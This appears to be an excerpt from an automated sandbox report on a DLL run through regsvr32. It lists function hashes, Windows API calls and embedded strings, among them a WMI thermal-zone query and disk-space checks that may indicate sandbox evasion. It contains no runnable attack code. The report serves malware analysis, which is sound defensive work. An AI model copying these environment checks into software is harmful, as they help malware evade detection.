                                                                                • String ID: StderrLock$lock count overflow in reentrant mutexstd\src\sync\reentrant_lock.rs
                                                                                • API String ID: 938658393-214416337
                                                                                • Opcode ID: 7d0698d3b608854b94f66a72beaf7516906c0cf3d6c45231d4e380671a93a810
                                                                                • Instruction ID: ca09f1b31012f7d4bacf8787d039a4a7207c2347063fdda82235c3263ac954df
                                                                                • Opcode Fuzzy Hash: 7d0698d3b608854b94f66a72beaf7516906c0cf3d6c45231d4e380671a93a810
                                                                                • Instruction Fuzzy Hash: C4D1ABA2F08A1686EBA4DF36D4043B96761EB48BA4F948635DE2E077C5DF3DE5428300
                                                                                APIs
                                                                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00000000,00000000,?,?,?,?,?,00007FFB9900CEDC), ref: 00007FFB9900FD03
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID:
                                                                                • API String ID: 2221118986-0
                                                                                • Opcode ID: 1044fb59293d1fddaa8e4ff40b5a29b2e6b2756d137971db36e6ec828bee6ada
                                                                                • Instruction ID: 21d8b45560919b3f7991b24f3f5efa1c9c65a559d3150b963678f97c18618de5
                                                                                • Opcode Fuzzy Hash: 1044fb59293d1fddaa8e4ff40b5a29b2e6b2756d137971db36e6ec828bee6ada
                                                                                • Instruction Fuzzy Hash: 51024563E19B8682EA61CF28D5112B86720FB96BA4F459335DFAD067D2DF3CE191C300
                                                                                APIs
                                                                                • BCryptGenRandom.BCRYPT(?,00000000,?,00007FFB990567B5,?,?,00000000,00007FFB99053176), ref: 00007FFB99056C72
                                                                                • SystemFunction036.ADVAPI32(?,00000000,?,00007FFB990567B5,?,?,00000000,00007FFB99053176), ref: 00007FFB99056C85
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: CryptFunction036RandomSystem
                                                                                • String ID:
                                                                                • API String ID: 1232939966-0
                                                                                • Opcode ID: edaf3c05d39f4af3d537a6341ff7a846ba6def7ed363080595f2fe368e43d273
                                                                                • Instruction ID: c308297c6aed60313341649bd927ea78001d542efbdcb5365a76209cb794f1a4
                                                                                • Opcode Fuzzy Hash: edaf3c05d39f4af3d537a6341ff7a846ba6def7ed363080595f2fe368e43d273
                                                                                • Instruction Fuzzy Hash: 12F0B4E2F191A705FEF41D7B9E0457589815F257F0D288335AD7D87AD6EC29F8821102
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: DiskFreeSpace
                                                                                • String ID:
                                                                                • API String ID: 1705453755-0
                                                                                • Opcode ID: a4ddce30272e5139cc5a03e003ae9961be119e76b0352709f53b54bbd1793538
                                                                                • Instruction ID: d12c0a8a7b62b5d8886d501b0b1156fe8b2a838faf036450ac403619bb96c5af
                                                                                • Opcode Fuzzy Hash: a4ddce30272e5139cc5a03e003ae9961be119e76b0352709f53b54bbd1793538
                                                                                • Instruction Fuzzy Hash: A1F01C72618B4182E7609B61F4407AA7261E788784F548131EADE87B54CF7CD1818740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$FullNamePath
                                                                                • String ID: \\?\$\\?\UNC\
                                                                                • API String ID: 2482867836-3019864461
                                                                                • Opcode ID: ed3ffb806fa8e03f4d903f2f8905634a2cdfe26b5f29a395ac6398c736c96f8c
                                                                                • Instruction ID: e10640418ed9c0c977d549bd6c5ec73182c3d25ed3581a939429f0d0e7a5e524
                                                                                • Opcode Fuzzy Hash: ed3ffb806fa8e03f4d903f2f8905634a2cdfe26b5f29a395ac6398c736c96f8c
                                                                                • Instruction Fuzzy Hash: 8212A2E2E0969385EBB89F31C84C3B926A5FB05B94F418535DAAD4B7C5DF3CE6818340
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$AddressFullHandleModuleNamePathProcmemcmpmemcpy
                                                                                • String ID: SetThreadDescription$kernel32
                                                                                • API String ID: 1783792165-1950310818
                                                                                • Opcode ID: d16caf42d59669fbb94879889cb953ed7db0d01622573f9800f666c86dec7bb0
                                                                                • Instruction ID: 36041224b58dbf229a95fe385f3a6614fa6dc56c0ac9893b006a7bfe56aa21e7
                                                                                • Opcode Fuzzy Hash: d16caf42d59669fbb94879889cb953ed7db0d01622573f9800f666c86dec7bb0
                                                                                • Instruction Fuzzy Hash: B3B19DA6A0979386EBB99F31D8483B92655BF48BC8F558031CE2C4BB96DF3CD2418340
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32 ref: 00007FFB990A2B43
                                                                                • GetLastError.KERNEL32(?,?,?,00080088,?,00080070,00080070,00080060,00007FFB99086BC5), ref: 00007FFB990A2B5B
                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00080078,00007FFB99084E66), ref: 00007FFB990A2B9A
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00080078,00007FFB99084E66), ref: 00007FFB990A2DF5
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00080088,00000000,00000001,00080060,00007FFB990A2C84), ref: 00007FFB990A2E95
                                                                                • WriteConsoleW.KERNEL32 ref: 00007FFB990A2ED4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleHandle$ByteCharCloseErrorLastModeMultiWideWrite
                                                                                • String ID: called `Result::unwrap()` on an `Err` value
                                                                                • API String ID: 1828868761-2333694755
                                                                                • Opcode ID: 8148cda61f73774d321e2bf937e763286ce9fbc27c84f6f1da959c08a4a8812a
                                                                                • Instruction ID: f0028e9295209655d786be7765a7ab4e51c06f1b833f13657eb8ab8a20f739f8
                                                                                • Opcode Fuzzy Hash: 8148cda61f73774d321e2bf937e763286ce9fbc27c84f6f1da959c08a4a8812a
                                                                                • Instruction Fuzzy Hash: 13C1D1A2E0969355FBB88F74D6083FC2B61AB04798F458131DA6D47ACADF3CD185C390
                                                                                APIs
                                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,00000000,00007FFB990F0591,?,?,?,?,?,?,00007FFB991858D8,00000000), ref: 00007FFB990F03E7
                                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,00000000,00007FFB990F0591,?,?,?,?,?,?,00007FFB991858D8,00000000), ref: 00007FFB990F0410
                                                                                  • Part of subcall function 00007FFB990F0FD0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00007FFB990F0423,?,?,?,?,00000000,00000000,00007FFB990F0591), ref: 00007FFB990F0FE7
                                                                                • VirtualQuery.KERNEL32 ref: 00007FFB990F04DB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: __acrt_iob_func$QueryVirtual__stdio_common_vfprintf
                                                                                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                • API String ID: 2227559371-1534286854
                                                                                • Opcode ID: d2f35f438812628afec87083bd482c667a54cb9a11b415c01867761c60754505
                                                                                • Instruction ID: 91ec38d2745d2173ee0036cfe7cd1f1b588f06a8ea26b8550829e6f4dacc72e8
                                                                                • Opcode Fuzzy Hash: d2f35f438812628afec87083bd482c667a54cb9a11b415c01867761c60754505
                                                                                • Instruction Fuzzy Hash: A041C2F2A09A5782EBA08F21E840AB977B0FF85B90F954131DA5C173A4DF3CEA55C340
                                                                                APIs
                                                                                Strings
                                                                                • assertion failed: new_left_len <= CAPACITY, xrefs: 00007FFB990683D3
                                                                                • assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}, xrefs: 00007FFB990689A3
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}$assertion failed: new_left_len <= CAPACITY
                                                                                • API String ID: 3510742995-2079967719
                                                                                • Opcode ID: eb5419176b5d512d1769c9db9a8281a698320489efb31ddfcb6e8d91e022418b
                                                                                • Instruction ID: 77df128966c78f5ea15f1ecc2a14181066f3c6fcea6f3eb2fcbb8340448510c5
                                                                                • Opcode Fuzzy Hash: eb5419176b5d512d1769c9db9a8281a698320489efb31ddfcb6e8d91e022418b
                                                                                • Instruction Fuzzy Hash: 17428972A04BC285E771CF24E8413E933A8FB58B88F548226DE9D5BB95DF78D295C300
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: DiskFindFreeNextSpaceVolumememcpymemset
                                                                                • String ID:
                                                                                • API String ID: 2905604665-0
                                                                                • Opcode ID: 5c7e42a3f69397965ca1a5bc3867ce836ab2c1ddcc91dfdcdff7d9b1013b988a
                                                                                • Instruction ID: eb4bebc0ccd7ca6282ae5ebf9c5529d4f3738352257dd59319ca4740409602f4
                                                                                • Opcode Fuzzy Hash: 5c7e42a3f69397965ca1a5bc3867ce836ab2c1ddcc91dfdcdff7d9b1013b988a
                                                                                • Instruction Fuzzy Hash: 8FC1C4B2A0CB4281EBB09B25E44037AA6A0FF84794FA49635EEAD477D5DF3CD540C704
                                                                                APIs
                                                                                Strings
                                                                                • environment variable not foundenvironment variable was not valid unicode: , xrefs: 00007FFB9907C27D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$EnvironmentVariable
                                                                                • String ID: environment variable not foundenvironment variable was not valid unicode:
                                                                                • API String ID: 2691138088-3632183283
                                                                                • Opcode ID: 229e23d2f11a467241cf802ba7087207a0a802c7da828c653801ced37b386dfc
                                                                                • Instruction ID: 561abae6024e23d2bae92c63d4f0dce48a99e5ae7dea64948bc733481fe84a93
                                                                                • Opcode Fuzzy Hash: 229e23d2f11a467241cf802ba7087207a0a802c7da828c653801ced37b386dfc
                                                                                • Instruction Fuzzy Hash: 15B1BEA2B04AA285EBB49F71D8443FD2764BB45BD8F148435CE6C9BB99DF3DD2818340
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$FullNamePathmemcmpmemcpy
                                                                                • String ID:
                                                                                • API String ID: 2015650653-0
                                                                                • Opcode ID: c2071ec9951aaa0769291ec01c2e441aa3e53cac064bcbed00e60981cebdbddb
                                                                                • Instruction ID: 2978269d2f65d5afd7ba583f0852af380f77383c63ca707b3e815165710e3ac0
                                                                                • Opcode Fuzzy Hash: c2071ec9951aaa0769291ec01c2e441aa3e53cac064bcbed00e60981cebdbddb
                                                                                • Instruction Fuzzy Hash: 7CA1A0A6B0979386EBB99F31D8493B96659BF54BC8F558032DE2C4BB85DF3CD2408340
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$CurrentDirectoryFileModuleName
                                                                                • String ID:
                                                                                • API String ID: 1505103792-0
                                                                                • Opcode ID: f19fe9e112a66080942e94092620ba0b0f9219739f2db8bc937d5c26f35f82ba
                                                                                • Instruction ID: 8f27a6ba5d2e1fc27dc660d7faf1c24c5e5945e127cd1fcdbbd3df32ff442e78
                                                                                • Opcode Fuzzy Hash: f19fe9e112a66080942e94092620ba0b0f9219739f2db8bc937d5c26f35f82ba
                                                                                • Instruction Fuzzy Hash: EF71B0A2B08A9285FBB59F75D8453F96755BF04BE8F048131DE6C57A8ADF2CE2808300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: String$Free$AllocUninitialize
                                                                                • String ID: SELECT * FROM MSAcpi_ThermalZoneTemperature$WQL
                                                                                • API String ID: 522029473-2989581318
                                                                                • Opcode ID: d533c448bf5a03fad7bf9007f40bf8e5e398e176ce492cda1bdb937de17db41d
                                                                                • Instruction ID: ad55c17fbd156e955dd4c535879c35d263e231a16cace7fbb1f4369d1f65e11d
                                                                                • Opcode Fuzzy Hash: d533c448bf5a03fad7bf9007f40bf8e5e398e176ce492cda1bdb937de17db41d
                                                                                • Instruction Fuzzy Hash: A8417EB2609B4292EAB09F22E85136AB7A4FF55784F440035EF9E43796EF7CE085C340
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: abort$CaptureContextExceptionRaiseUnwind
                                                                                • String ID: CCG
                                                                                • API String ID: 4122134289-1584390748
                                                                                • Opcode ID: f7441c84a6678f3ea4936f78d6106ab053f9af8d469b1ea39c4bf20af513a4ce
                                                                                • Instruction ID: cf10392aa6c15b8fa1bec61960731458e5faa14f37a4a60adb35f933dc9d85bd
                                                                                • Opcode Fuzzy Hash: f7441c84a6678f3ea4936f78d6106ab053f9af8d469b1ea39c4bf20af513a4ce
                                                                                • Instruction Fuzzy Hash: 09316F72A18BC686E7609F24E4403AA7771FBD9788F509226DB8C13765DF79D1A1CB00
                                                                                APIs
                                                                                  • Part of subcall function 00007FFB9904AFC0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FFB9904B0F2
                                                                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,00000008,?,?,?,?,00000000,00007FFB9904C9C0), ref: 00007FFB9904B46A
                                                                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,00000008,?,?,?,?,00000000,00007FFB9904C9C0), ref: 00007FFB9904B511
                                                                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,00000008,?,?,?,?,00000000,00007FFB9904C9C0), ref: 00007FFB9904B5C1
                                                                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,00000008,?,?,?,?,00000000,00007FFB9904C9C0), ref: 00007FFB9904B671
                                                                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,00000008,?,?,?,?,00000000,00007FFB9904C9C0), ref: 00007FFB9904B721
